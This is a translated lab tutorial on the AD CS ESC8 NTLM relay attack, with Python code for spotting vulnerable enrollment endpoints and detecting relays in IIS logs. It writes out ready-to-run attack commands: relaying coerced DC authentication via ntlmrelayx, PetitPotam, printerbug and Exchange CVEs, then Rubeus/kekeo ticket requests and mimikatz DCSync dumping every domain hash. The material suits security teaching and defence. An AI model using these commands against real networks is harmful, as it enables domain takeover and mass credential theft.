Preface
ADCS ESC8, also known as the ADCS relay attack, is the most commonly exploited weakness in AD CS.
ADCS ESC1-ESC8 reference: https://mp.weixin.qq.com/s/CG-kSHyWDnUERL4NGddiRw
Root cause: the HTTP certificate enrollment interface of AD CS (the web enrollment site under /certsrv) does not enable NTLM relay protection (it is served over plain HTTP and Extended Protection for Authentication is not enabled by default), so it is vulnerable to NTLM relay. In addition, the endpoint's HTTP authentication is configured to allow only NTLM, so Kerberos cannot be negotiated. An attacker can therefore relay NTLM authentication to the AD CS certificate service and obtain a certificate in the name of the relayed account.
Attack flow:
1. Through ntlmrelayx we obtain an authentication certificate for machine account A (the relayed identity).
2. We use the Rubeus asktgt function with that certificate to perform Kerberos (PKINIT) authentication against AD.
3. We obtain a TGT and request a TGS for the target machine's service name, gaining access.
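The two preconditions just described (NTLM accepted on /certsrv, no relay protection) can be read off the 401 challenge the enrollment page returns. The following is an added example written for this article, not code from the original post or from impacket: it classifies a response from the web enrollment page and can optionally probe a live host. The host names and URLs are placeholders; the EPA state cannot be seen in headers, so it is reported as a follow-up check rather than decided.

```python
"""Added example for this article (not code from the original post or from
impacket): triage whether an AD CS web enrollment endpoint meets the ESC8
preconditions described above.

ESC8 needs the /certsrv endpoint to (1) accept NTLM, directly or through
Negotiate, which falls back to NTLM when the relayed client cannot use
Kerberos, and (2) lack relay protection: plain HTTP, or HTTPS without
Extended Protection for Authentication (EPA). The first point can be read off
the WWW-Authenticate headers of the 401 challenge; the EPA state cannot, so it
is reported as a follow-up check. Host names below are placeholders.
"""
import http.client
from dataclasses import dataclass, field
from typing import List, Set
from urllib.parse import urlsplit


@dataclass
class Esc8Finding:
    url: str
    ntlm_offered: bool
    negotiate_offered: bool
    plaintext_http: bool
    notes: List[str] = field(default_factory=list)

    @property
    def relayable(self) -> bool:
        # NTLM reachable over plain HTTP is the textbook ESC8 condition.
        # Over HTTPS the relay still works when EPA is off, but that cannot be
        # decided from headers alone, so it is not claimed here.
        return (self.ntlm_offered or self.negotiate_offered) and self.plaintext_http


def auth_schemes(www_authenticate: List[str]) -> Set[str]:
    """Lower-cased scheme tokens from WWW-Authenticate values.
    IIS sends one header per scheme ("Negotiate", "NTLM"); comma-joined
    values are also handled."""
    schemes: Set[str] = set()
    for value in www_authenticate:
        for part in value.split(","):
            token = part.strip().split(" ", 1)[0].lower()
            if token:
                schemes.add(token)
    return schemes


def assess_certsrv(url: str, status: int, www_authenticate: List[str]) -> Esc8Finding:
    """Classify one unauthenticated response from the enrollment page."""
    schemes = auth_schemes(www_authenticate)
    finding = Esc8Finding(
        url=url,
        ntlm_offered="ntlm" in schemes,
        negotiate_offered="negotiate" in schemes,
        plaintext_http=urlsplit(url).scheme.lower() == "http",
    )
    if status != 401:
        finding.notes.append(
            f"status {status} instead of 401: endpoint disabled, anonymous, or not AD CS")
    if finding.ntlm_offered and not finding.negotiate_offered:
        finding.notes.append("only NTLM advertised: Kerberos cannot be negotiated")
    if (finding.ntlm_offered or finding.negotiate_offered) and not finding.plaintext_http:
        finding.notes.append(
            "HTTPS: verify Extended Protection is Required in IIS, otherwise still relayable")
    return finding


def probe_certsrv(url: str, timeout: float = 5.0) -> Esc8Finding:
    """Send one unauthenticated GET and classify the challenge.
    Network code: run only against a CA you are authorised to test."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        conn.request("GET", parts.path or "/certsrv/")
        resp = conn.getresponse()
        # get_all keeps duplicate WWW-Authenticate headers instead of merging them
        challenges = resp.headers.get_all("WWW-Authenticate") or []
        return assess_certsrv(url, resp.status, challenges)
    finally:
        conn.close()


if __name__ == "__main__":
    # Constructed sample: the default IIS challenge on a plain-HTTP CA
    sample = assess_certsrv("http://ca.corp.local/certsrv/", 401, ["Negotiate", "NTLM"])
    print(sample.relayable, sample.notes)
```

`probe_certsrv("http://192.168.184.216/certsrv/")` against the lab CA from this article would return a finding with `relayable` set, since the endpoint is plain HTTP and advertises NTLM; the same CA behind HTTPS with EPA set to Required is the hardened case discussed under Detection and defense.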
1, Add ADCS service
- Add the Active Directory Certificate Services role.
- Select the Certification Authority role service.
- Click Install directly.
2, Configure ADCS service
- Select Enterprise CA.
- In Certificate Templates, right-click a template and choose Duplicate Template.
- Change the name to LDAPS.
- Right-click > Properties > Request Handling > allow the private key to be exported.
- Publish the new template (Certificate Templates > New > Certificate Template to Issue).
- Request a new certificate with it.
3, ADCS-ESC8 attack
Lab environment:
- PDC: 192.168.184.217
- BDC (ADCS): 192.168.184.216
- Kali: 192.168.184.135
- Server 2012: 192.168.184.238
(1) Locate the certificate server
certutil -config - -ping
certutil -ca
(2) ntlmrelayx listening
This requires the ADCS-enabled branch of impacket ( https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack ); the --adcs option has since been merged into mainline impacket.
sudo python3 ntlmrelayx.py -t http://192.168.184.216/certsrv/certfnsh.asp -smb2support --adcs
(3) Trigger back connection
Use a coercion script to make the domain controller (the one that is not the CA host, here the PDC 192.168.184.217) authenticate back to our attack machine. Either the latest PetitPotam.py or printerbug.py will do.
1. PetitPotam (no credentials needed here)
python3 PetitPotam.py <kali ip> <dc ip>
python3 PetitPotam.py 192.168.184.135 192.168.184.217
2. Printerbug (requires a domain user account)
python3 printerbug.py <domain>/<user>@<dc ip> <kali ip>
python3 printerbug.py mark/hacker@192.168.184.217 192.168.184.135
(4) ntlmrelayx relays the authentication successfully and prints the certificate (base64 PFX) issued to the DC machine account
(5) Get domain admin
With this certificate, use kekeo or Rubeus to request a TGT for the DC machine account; with that ticket you can DCSync.
kekeo:
base64 /input:on
tgt::ask /pfx:xxx /user:DC01$ /ptt
Rubeus:
Rubeus.exe asktgt /user:DC01$ /certificate:xxx /ptt
With mimikatz you can then dump the hash of any user in the domain:
mimikatz.exe
# view the Kerberos tickets in the session
kerberos::list
# dump the krbtgt hash
lsadump::dcsync /user:krbtgt /csv
# dump every hash in the domain
lsadump::dcsync /all /csv /domain:mark.com
Pitfalls:
(1) Rubeus error 1
Solution: use Rubeus version 1.6.4.
(2) Rubeus error 2
KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED
Solution
Open Group Policy and go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options, find "Network security: Configure encryption types allowed for Kerberos", and check all of the listed types.
After applying the change, reboot and request the TGT again.
Note that KDC_ERR_CLIENT_NOT_TRUSTED means the KDC could not validate the client certificate's chain; if the policy change does not help, check that the issuing CA's certificate is in the NTAuth store and trusted by the domain controller.
Detection and defense
- If the web enrollment endpoint (certsrv) is not needed, disable it.
- Otherwise, in the IIS configuration of the certsrv site (the endpoint we relay to), remove NTLM from the Windows Authentication providers so that NTLM can no longer be used; this blocks the relay. Microsoft's guidance in KB5005413 additionally recommends requiring HTTPS and setting Extended Protection for Authentication to Required on the web enrollment site.
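On the detection side, the relay leaves a clear trace in the IIS log of the CA's web enrollment site: a machine account (name ending in "$") authenticating to /certsrv/certfnsh.asp from an address that is not its own. The following is an added example written for this article, not code from the original post: it parses W3C-format IIS log lines and flags that pattern. The log lines and the machine-to-IP inventory are constructed for the example and reuse the lab addresses above (CA .216, DC .217, attacker .135).

```python
"""Added example for this article (not code from the original post): ESC8
detection over the IIS W3C log of the CA's web enrollment site.

Machine accounts (names ending in "$") enrol through DCOM/RPC autoenrollment,
not through /certsrv. A machine account POSTing to /certsrv/certfnsh.asp (the
page ntlmrelayx submits the CSR to) is the relay in progress, and a client IP
that is not the machine's own IP is the attacker's relay host. The log lines
and the host inventory below are constructed for this example and follow the
lab addresses in the article (CA .216, DC .217, attacker .135).
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List

# Constructed IIS log: a normal user browsing, a server enrolling from its own
# address, then DC01$ relayed from the attacker box (.135).
SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-08-10 09:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-08-10 09:01:10 192.168.184.216 GET /certsrv/ - 80 - 192.168.184.238 Mozilla/5.0 - 401 2 5 3
2021-08-10 09:01:11 192.168.184.216 GET /certsrv/ - 80 MARK\alice 192.168.184.238 Mozilla/5.0 - 200 0 0 15
2021-08-10 09:02:30 192.168.184.216 GET /certsrv/certrqus.asp - 80 MARK\SRV2012$ 192.168.184.238 Mozilla/5.0 - 200 0 0 9
2021-08-10 09:05:42 192.168.184.216 POST /certsrv/certfnsh.asp - 80 - 192.168.184.135 Mozilla/5.0 - 401 2 5 1
2021-08-10 09:05:42 192.168.184.216 POST /certsrv/certfnsh.asp - 80 MARK\DC01$ 192.168.184.135 Mozilla/5.0 - 200 0 0 120
2021-08-10 09:05:43 192.168.184.216 GET /certsrv/certnew.cer ReqID=42&Enc=b64 80 MARK\DC01$ 192.168.184.135 Mozilla/5.0 - 200 0 0 8
"""

# Constructed inventory: machine account -> its real address
KNOWN_HOST_IPS: Dict[str, str] = {
    "MARK\\DC01$": "192.168.184.217",
    "MARK\\SRV2012$": "192.168.184.238",
}


@dataclass
class Esc8Alert:
    when: str
    account: str
    client_ip: str
    uri: str
    severity: str  # "high" = machine account from a foreign IP, "medium" = from its own IP
    reason: str


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per data line, keyed by the names in the #Fields directive."""
    fields: List[str] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue  # malformed or pre-header line; skip rather than guess
        yield dict(zip(fields, values))


def detect_esc8(records: Iterable[Dict[str, str]],
                known_host_ips: Dict[str, str]) -> List[Esc8Alert]:
    """Flag successful /certsrv requests authenticated as a machine account."""
    inventory = {k.upper(): v for k, v in known_host_ips.items()}
    alerts: List[Esc8Alert] = []
    for rec in records:
        user = rec.get("cs-username", "-")
        uri = rec.get("cs-uri-stem", "").lower()
        if user == "-" or not user.endswith("$") or not uri.startswith("/certsrv/"):
            continue
        if rec.get("sc-status") != "200":
            continue  # the 401 challenge rounds of NTLM are noise
        client_ip = rec.get("c-ip", "")
        expected = inventory.get(user.upper())
        if expected and client_ip != expected:
            severity = "high"
            reason = f"machine account from {client_ip}, its own address is {expected}: relayed"
        else:
            severity = "medium"
            reason = "machine account using web enrollment instead of DCOM autoenrollment"
        alerts.append(Esc8Alert(f"{rec['date']} {rec['time']}", user, client_ip, uri, severity, reason))
    return alerts


def run_on_sample() -> List[Esc8Alert]:
    return detect_esc8(parse_w3c(SAMPLE_IIS_LOG.splitlines()), KNOWN_HOST_IPS)


if __name__ == "__main__":
    for a in run_on_sample():
        print(a.severity.upper(), a.when, a.account, a.client_ip, a.uri, "-", a.reason)
```

On the sample, the two DC01$ entries from 192.168.184.135 come out as high-severity alerts and the SRV2012$ entry from its own address as medium. In a real deployment, corroborate a high alert with Security event 4887 on the CA (certificate issued, Requester DC01$, template Machine) at the same timestamp; the two together are the ESC8 relay.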
4, About NTLM coercion [excerpted from an evi1cg article]
(1) Passive triggering
The usual approach is to construct a UNC path for the target to access, for example:
dir \\host\share\xx
Or send an email containing an image whose source is a UNC path, for example:
<img src="\\host\share\xx">
Passive triggering depends on the victim acting, so active triggering is generally preferred.
(2) Active triggering
Most active triggers require the account and password of a domain member.
Exchange
Exchange is a high-value target. By default, the Exchange Windows Permissions security group has WriteDACL on the domain object of the domain Exchange is installed in, which allows privilege escalation; Exchange can also be used to take over the domain directly.
1. CVE-2018-8581
This vulnerability is essentially an SSRF. When Exchange processes a user's push subscription in its underlying logic, the Exchange server authenticates to the target address with the Net-NTLM credentials of its machine account. A malicious server can therefore capture the Net-NTLM authentication of the Exchange server's machine account and relay it (NTLM cannot be replayed) to obtain administrator privileges.
Use the relay to dump a specified user's hash directly:
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
2. CVE-2019-1040
Combine CVE-2019-1040 (NTLM MIC bypass) with the printer bug: coerce the Exchange server to authenticate back over SMB and relay that authentication to LDAP.
Reference: https://www.cnblogs.com/mrhonest/p/14187849.html
1. The attacker starts the relay:
impacket-ntlmrelayx --escalate-user chenli -t ldap://192.168.110.12 -smb2support --remove-mic --delegate-access -debug
2. Trigger the printer bug against the Exchange server:
Windows: spoolsample.exe <exchange IP> <attacker IP>
Kali: python3 printerbug.py sync.net/chenli:cl123\!\@\#45@192.168.110.81 192.168.1.103
RPC exploitation
1. Printer bug
Microsoft considers this intended behaviour and provides no patch. spoolsv.exe registers a service and several RPC interfaces that authenticated users may call remotely. The function RpcRemoteFindFirstPrinterChangeNotificationEx takes a UNC path, and the print spooler service connects to it. Because the spooler runs as SYSTEM, calling this RPC forces the spooler to authenticate to us, and the Net-NTLM hash we obtain is that of the machine account.
python printerbug.py cgdomain.com/test:'1qaz@WSX'@10.211.55.201 10.211.55.2
2. PetitPotam
PetitPotam is a new RPC coercion method released in July this year (2021). After patching, many print spooler services were shut down, so attackers developed an RPC coercion through EFS instead.
The Encrypting File System (EFS) is a feature Microsoft introduced in NTFS 3.0 that provides file-system-level encryption, letting files be encrypted transparently to protect confidential data from attackers with physical access. EFS has been available in all Windows versions developed for business environments since Windows 2000. The vulnerability abuses the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC), which performs "maintenance and management operations" on encrypted data stored remotely and accessed over the network. Using it, an attacker connects to the LSARPC named pipe and forces the target machine to send its Net-NTLM authentication to a remote server of the attacker's choosing; with that Net-NTLM authentication in hand, an NTLM relay attack can take over the whole domain. This replaces Printerbug. In particular, an attacker can use MS-EFSRPC to relay the DC's NTLM credentials to the AD CS web enrollment page, enroll a certificate for the DC, and then use that certificate to authenticate to the domain controller.
Like the printer bug before it, the EFS RPC allows a malicious domain user and/or machine account to control the outgoing authentication of other machines. Server 2012 can be triggered anonymously; on Server 2016 and above the anonymous pipe is disabled by default and credentials are required to trigger it.
python Petitpotam.py -u sanfeng -p '1qaz@WSX' -d cgdomain.com 10.211.55.2 10.211.55.202
(3) Fully patched case
Even when the Exchange and printer-bug paths above are patched, if certificate services (AD CS with web enrollment) are installed you can fall back on the ADCS relay (ESC8) described earlier.
Reference articles:
- https://evi1cg.me/archives/NTLMRelay.html
- https://mp.weixin.qq.com/s/AmcC4DzmowbE3vQC0GYpag
- https://mp.weixin.qq.com/s/1AjmiaDOIKbYIAu7VAwIQg